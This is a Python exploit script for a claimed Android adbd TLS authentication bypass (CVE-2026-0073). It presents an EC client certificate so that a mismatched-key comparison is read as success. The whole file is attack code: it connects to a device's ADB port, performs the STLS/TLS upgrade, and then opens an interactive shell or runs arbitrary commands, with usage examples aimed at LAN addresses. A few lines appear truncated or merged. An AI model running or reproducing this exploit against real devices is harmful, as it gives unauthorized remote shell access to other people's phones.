#!/usr/bin/env python3 """ CVE-2026-0073 — Android adbd EVP_PKEY_cmp TLS authentication bypass adbd_tls_verify_cert() in daemon/auth.cpp uses EVP_PKEY_cmp() as a boolean. When the stored key is RSA and the presented TLS client cert carries a non-RSA key (EC P-256 or Ed25519), EVP_PKEY_cmp() returns -1 (type mismatch), which is truthy in C/C++, so authorized = true. 1. TCP connect to adbd port 2. Send cleartext ADB CNXN; receive STLS from device 3. Reply STLS; upgrade TCP to TLS 1.3 with ephemeral EC P-256 client cert 4. Post-TLS: drain device CNXN (and optional STLS notification) — do NOT send host CNXN (adbd_wifi_secure_connect already marks the transport online; a host CNXN would trigger handle_new_connection on an already-online transport, kicking it immediately) 5. OPEN(local_id, INITIAL_DELAYED_ACK_BYTES=32MB, "shell:\\x00") → OKAY → WRTE/OKAY shell Requirements: - Developer options enabled on target - Wireless debugging or ADB-over-TCP enabled (default port 5555) - At least one RSA key in /data/misc/adb/adb_keys (device has been paired before) - Network reachability to the adbd TCP port Usage: python3 adb_tls_auth_bypass.py [port] [--cmd ] Default port: 5555 Default cmd: interactive shell (stdin/stdout forwarded) Tested on 6.1.23-android14-4-00257-g7e35917775b8-ab9964412 Examples: python3 adb_tls_auth_bypass.py 192.168.1.42 python3 adb_tls_auth_bypass.py 192.168.1.42 5555 --cmd "id; getprop ro.build.version.release" """ import argparse import io import os import socket import ssl import struct import sys import tempfile import textwrap import threading import time from cryptography import x509 from cryptography.hazmat.primitives import hashes, serialization from cryptography.hazmat.primitives.asymmetric import ec from cryptography.x509.oid import NameOID import datetime # --------------------------------------------------------------------------- # ADB wire protocol constants # --------------------------------------------------------------------------- ADB_VERSION = 0x01000001 ADB_MAXDATA = 256 * 1024 ADB_BANNER = b"host::features=shell_v2,cmd,stat_v2,ls_v2,fixed_push_mkdir,apex,abb,fixed_push_symlink_timestamp,abb_exec,remount_shell,track_app,sendrecv_v2,sendrecv_v2_brotli,sendrecv_v2_lz4,sendrecv_v2_zstd,sendrecv_v2_dry_run_send,openscreen_mdns,delayed_ack" # adbd delayed_ack initial receive window (INITIAL_DELAYED_ACK_BYTES from adb.h) DELAYED_ACK_WINDOW = 32 * 1024 * 1024 # 0x2000000 CMD_CNXN = 0x4e584e43 CMD_STLS = 0x534c5453 CMD_AUTH = 0x41555448 CMD_OPEN = 0x4e45504f CMD_OKAY = 0x59414b4f CMD_WRTE = 0x45545257 CMD_CLSE = 0x45534c43 STLS_VERSION = 0x01000000 # --------------------------------------------------------------------------- # ADB packet framing # --------------------------------------------------------------------------- def _checksum(data: bytes) -> int: return sum(data) & 0xFFFFFFFF def pack_packet(cmd: int, arg0: int, arg1: int, data: bytes = b"") -> bytes: length = len(data) csum = _checksum(data) magic = cmd ^ 0xFFFFFFFF header = struct.pack(" bytes: buf = b"" while len(buf) < n: chunk = sock.recv(n - len(buf)) if not chunk: raise ConnectionError(f"connection closed after {len(buf)}/{n} bytes") buf += chunk return buf # --------------------------------------------------------------------------- # Ephemeral cross-algorithm TLS client certificate (EC P-256) # --------------------------------------------------------------------------- def make_ec_client_cert() -> tuple[bytes, bytes]: """ Generate a throw-away EC P-256 key + self-signed cert. The cert key type is intentionally EC, not RSA, to trigger the cross-algorithm EVP_PKEY_cmp() return value of -1. Returns (cert_pem, key_pem). """ key = ec.generate_private_key(ec.SECP256R1()) subject = issuer = x509.Name([ x509.NameAttribute(NameOID.COMMON_NAME, u"adbkey"), ]) cert = ( x509.CertificateBuilder() .subject_name(subject) .issuer_name(issuer) .public_key(key.public_key()) .serial_number(x509.random_serial_number()) .not_valid_before(datetime.datetime.utcnow()) .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=1)) .sign(key, hashes.SHA256()) ) cert_pem = cert.public_bytes(serialization.Encoding.PEM) key_pem = key.private_bytes( serialization.Encoding.PEM, serialization.PrivateFormat.TraditionalOpenSSL, serialization.NoEncryption(), ) return cert_pem, key_pem # --------------------------------------------------------------------------- # Core exploit # --------------------------------------------------------------------------- class ADBBypass: def __init__(self, host: str, port: int, verbose: bool = False): self.host = host self.port = port self.verbose = verbose self.sock = None # raw TCP socket (cleartext phase) self.tls = None # TLS-wrapped socket (post-upgrade) self._local_id = 1 self._remote_id = None def _log(self, msg: str): if self.verbose: print(f"[*] {msg}", file=sys.stderr) def _send(self, sock, data: bytes): sock.sendall(data) # --- Phase 1: cleartext ADB CNXN → STLS negotiation ------------------- def connect(self): self._log(f"connecting to {self.host}:{self.port}") self.sock = socket.create_connection((self.host, self.port), timeout=10) # Send CNXN cnxn = pack_packet(CMD_CNXN, ADB_VERSION, ADB_MAXDATA, ADB_BANNER) self._log("sending CNXN") self._send(self.sock, cnxn) # Expect STLS back — device may send CNXN first on some builds, tolerate it for _ in range(3): cmd, arg0, arg1, data = recv_packet(self.sock) self._log(f" <- {cmd:#010x} arg0={arg0:#x} arg1={arg1:#x} data={data[:64]!r}") if cmd == CMD_STLS: stls_version = arg0 self._log(f"received STLS version={stls_version:#x}") break elif cmd == CMD_AUTH: # Device sent AUTH instead of STLS — not the wireless-debugging path raise RuntimeError( "Device responded with AUTH instead of STLS. " "Target is not using the STLS/TLS wireless-debugging path " "(may be legacy ADB TCP, or auth_required=false)." ) elif cmd == CMD_CNXN: self._log("received pre-STLS CNXN, waiting for STLS...") continue else: raise RuntimeError(f"unexpected command {cmd:#010x} during CNXN negotiation") else: raise RuntimeError("did not receive STLS from device") # Reply STLS self._log("sending STLS reply") self._send(self.sock, pack_packet(CMD_STLS, stls_version, 0)) # --- Phase 2: TLS upgrade with cross-algorithm client cert ------------- def upgrade_tls(self, cert_pem: bytes, key_pem: bytes): """Wrap the existing TCP socket in TLS 1.3 with the EC client cert.""" self._log("upgrading to TLS 1.3 with EC P-256 client certificate") # Write cert/key to temp files (ssl module needs file paths) with tempfile.NamedTemporaryFile(delete=False, suffix=".pem") as cf: cf.write(cert_pem) cert_path = cf.name with tempfile.NamedTemporaryFile(delete=False, suffix=".pem") as kf: kf.write(key_pem) key_path = kf.name try: ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE # we don't validate server cert ctx.minimum_version = ssl.TLSVersion.TLSv1_3 ctx.maximum_version = ssl.TLSVersion.TLSv1_3 ctx.load_cert_chain(certfile=cert_path, keyfile=key_path) self.tls = ctx.wrap_socket(self.sock, server_hostname=self.host) self._log(f"TLS handshake complete: {self.tls.version()}, cipher={self.tls.cipher()}") finally: os.unlink(cert_path) os.unlink(key_path) # --- Phase 3: post-TLS ADB service layer ------------------------------- def post_tls_cnxn(self): """Drain post-TLS device packets (CNXN + optional STLS). The adbwifi path: adbd_wifi_secure_connect() calls handle_online(t) and send_connect(t) which sends the device CNXN. The transport is already online at this point. We must NOT send a host CNXN — doing so calls handle_new_connection() on an already-online transport which kicks it. """ for _ in range(6): cmd, arg0, arg1, data = recv_packet(self.tls) self._log(f" <- {cmd:#010x} arg0={arg0:#x} data={data[:64]!r}") if cmd == CMD_CNXN: self._log(f"device CNXN: {data.decode(errors='replace')}") break elif cmd == CMD_STLS: self._log(f"post-TLS STLS notification (version={arg0:#x}), ignoring") continue else: raise RuntimeError(f"expected CNXN/STLS inside TLS, got {cmd:#010x}") else: raise RuntimeError("did not receive post-TLS CNXN from device") # Drain the trailing STLS notification if present self._recv_skip_stls_drain() def _recv_skip_stls_drain(self): """Non-blocking drain of any buffered STLS notifications (max 0.3s).""" deadline = time.monotonic() + 0.3 while time.monotonic() < deadline: try: self.tls.settimeout(0.05) cmd, arg0, arg1, data = recv_packet(self.tls) if cmd != CMD_STLS: # Unexpected non-STLS — log and ignore, don't block self._log(f" unexpected post-drain packet {cmd:#010x}, ignoring") except (socket.timeout, OSError): break finally: self.tls.settimeout(None) def _recv_skip_stls(self): """Receive next packet, silently ignoring any STLS notifications.""" for _ in range(8): cmd, arg0, arg1, data = recv_packet(self.tls) if cmd != CMD_STLS: return cmd, arg0, arg1, data self._log(f" STLS notification, ignoring") raise RuntimeError("too many STLS frames") def open_shell(self) -> int: """Send OPEN shell:\\x00 with delayed_ack window. Returns remote_id on OKAY.""" payload = b"shell:\x00" self._log(f"sending OPEN local_id={self._local_id} window={DELAYED_ACK_WINDOW:#x}") self._send(self.tls, pack_packet(CMD_OPEN, self._local_id, DELAYED_ACK_WINDOW, payload)) cmd, arg0, arg1, data = self._recv_skip_stls() self._log(f" <- {cmd:#010x} arg0={arg0:#x} arg1={arg1:#x}") if cmd != CMD_OKAY: raise RuntimeError(f"OPEN rejected: {cmd:#010x} (expected OKAY)") self._remote_id = arg0 self._log(f"shell stream opened: local={self._local_id} remote={self._remote_id}") # Acknowledge the OKAY to grant our write window self._send_okay() return self._remote_id def _send_okay(self): self._send(self.tls, pack_packet(CMD_OKAY, self._local_id, self._remote_id)) def run_command(self, cmd_str: str) -> str: """Run a single command, collect all output, return as string.""" payload = f"shell:{cmd_str}\x00".encode() self._log(f"OPEN for command: {cmd_str!r}") self._send(self.tls, pack_packet(CMD_OPEN, self._local_id, DELAYED_ACK_WINDOW, payload)) cmd_r, arg0, arg1, data = self._recv_skip_stls() if cmd_r != CMD_OKAY: raise RuntimeError(f"OPEN for command rejected: {cmd_r:#010x}") remote = arg0 self._send(self.tls, pack_packet(CMD_OKAY, self._local_id, remote)) output = io.BytesIO() while True: cmd_r, arg0, arg1, data = recv_packet(self.tls) if cmd_r == CMD_WRTE: output.write(data) self._send(self.tls, pack_packet(CMD_OKAY, self._local_id, remote)) elif cmd_r == CMD_CLSE: break elif cmd_r == CMD_OKAY: continue else: break return output.getvalue().decode(errors="replace") def interactive_shell(self): """Forward stdin/stdout to the open ADB shell stream.""" print("[+] interactive shell — Ctrl+C to exit", file=sys.stderr) stop = threading.Event() def reader(): while not stop.is_set(): cmd_r, arg0, arg1, data = recv_packet(self.tls) if cmd_r == CMD_WRTE: sys.stdout.buffer.write(data) sys.stdout.buffer.flush() self._send_okay() elif cmd_r == CMD_CLSE: stop.set() break elif cmd_r == CMD_OKAY: continue def writer(): # select() on Windows only works on sockets, not stdin — use a blocking # read thread instead; the daemon flag ensures it exits when reader ends. while not stop.is_set(): try: data = sys.stdin.buffer.read1(4096) except (OSError, ValueError): break if data: self._send(self.tls, pack_packet(CMD_WRTE, self._local_id, self._remote_id, data)) t_read = threading.Thread(target=reader, daemon=True) t_write = threading.Thread(target=writer, daemon=True) t_read.start() t_write.start() try: while t_read.is_alive(): t_read.join(timeout=0.2) except KeyboardInterrupt: pass finally: stop.set() def close(self): try: if self.tls: self.tls.close() elif self.sock: self.sock.close() except Exception: pass # --------------------------------------------------------------------------- # Entry point # --------------------------------------------------------------------------- def main(): parser = argparse.ArgumentParser( description="CVE-2026-0073 — ADB EVP_PKEY_cmp TLS auth bypass", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=textwrap.dedent("""\ Examples: %(prog)s 192.168.1.42 %(prog)s 192.168.1.42 5555 --cmd "id" %(prog)s 192.168.1.42 5555 --cmd "getprop ro.build.version.security_patch" """), ) parser.add_argument("host", help="target device IP or hostname") parser.add_argument("port", nargs="?", type=int, default=5555, help="ADB port (default 5555)") parser.add_argument("--cmd", help="shell command to run (default: interactive shell)") parser.add_argument("-v", "--verbose", action="store_true") args = parser.parse_args() cert_pem, key_pem = make_ec_client_cert() bypass = ADBBypass(args.host, args.port, verbose=args.verbose) try: bypass.connect() bypass.upgrade_tls(cert_pem, key_pem) bypass.post_tls_cnxn() if args.cmd: output = bypass.run_command(args.cmd) print(output, end="") else: bypass.open_shell() bypass.interactive_shell() except KeyboardInterrupt: pass except Exception as e: print(f"[-] {e}", file=sys.stderr) sys.exit(1) finally: bypass.close() if __name__ == "__main__": main()